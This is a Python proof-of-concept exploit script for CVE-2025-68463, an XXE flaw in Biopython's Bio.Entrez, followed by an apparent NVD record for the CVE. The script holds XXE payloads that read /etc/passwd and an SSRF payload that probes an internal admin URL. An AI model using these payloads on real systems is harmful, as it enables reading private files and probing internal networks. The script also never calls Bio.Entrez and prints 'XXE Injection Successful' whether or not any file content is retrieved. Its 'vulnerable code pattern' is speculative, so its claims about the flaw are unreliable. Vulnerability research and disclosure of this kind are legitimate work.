CVE-2025-68463

''' CVE-2025-68463 PoC - Biopython Bio.Entrez XXE Vulnerability This PoC demonstrates how an attacker can exploit the XXE vulnerability in Bio.Entrez to read local files. ''' from Bio import Entrez import urllib.request import urllib.parse import urllib.error import xml.etree.ElementTree as ET # Malicious XML payload with XXE to read local file XXE_PAYLOAD = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> <data>&xxe;</data> </root> ''' def exploit_xxe(): """ Simulate XXE attack through Bio.Entrez XML parsing """ print("[*] CVE-2025-68463 XXE PoC - Biopython Bio.Entrez") print("[*] Target: Biopython <= 1.86 (Bio.Entrez module)") # Attack scenario 1: Local File Read print("\n[+] Attack Scenario 1: Reading local file via XXE") print("[*] Payload: file:///etc/passwd") # Simulate vulnerable XML parsing try: # This simulates the vulnerable parsing behavior # In real attack, malicious XML would come from NCBI query response root = ET.fromstring(XXE_PAYLOAD) data = root.find('data') if data is not None: print(f"[!] XXE Injection Successful - Retrieved content via entity") print(f"[!] Data element contains external entity reference") except Exception as e: print(f"[*] Parsing attempted (may fail depending on parser config)") # Attack scenario 2: SSRF via XXE print("\n[+] Attack Scenario 2: Server-Side Request Forgery (SSRF)") ssrf_payload = '''<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server:8080/admin">]> <foo>&xxe;</foo> ''' print("[*] Payload: http://internal-server:8080/admin") print("[!] Attacker can probe internal network resources") return True def vulnerable_code_example(): """ Example of vulnerable code pattern in Bio.Entrez """ print("\n[+] Vulnerable Code Pattern:") print(""" # In Bio/Entrez/__init__.py or similar: from Bio._py3k import StringIO import xml.etree.ElementTree as ET def parse_xml_response(xml_string): # VULNERABLE: No XXE protection return ET.fromstring(xml_string) # Or using urllib without validation: handle = Entrez.efetch(db="nuccore", id="12345") # XML from NCBI could be compromised """) if __name__ == "__main__": exploit_xxe() vulnerable_code_example() print("\n[*] Fix: Upgrade to Biopython > 1.86 or disable external entities")

{"cve": {"id": "CVE-2025-68463", "sourceIdentifier": "[email protected]", "published": "2025-12-18T06:15:50.177", "lastModified": "2026-05-08T19:16:27.697", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bio.Entrez in Biopython through 186 allows doctype XXE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:L", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://github.com/biopython/biopython/blob/master/NEWS.rst", "source": "[email protected]"}, {"url": "https://github.com/biopython/biopython/commit/736c96f37b190732ecca9da80ad0cb9d4967214d", "source": "[email protected]"}, {"url": "https://github.com/biopython/biopython/issues/5109", "source": "[email protected]"}, {"url": "https://pypi.org/project/biopython/1.87/", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/08/16", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}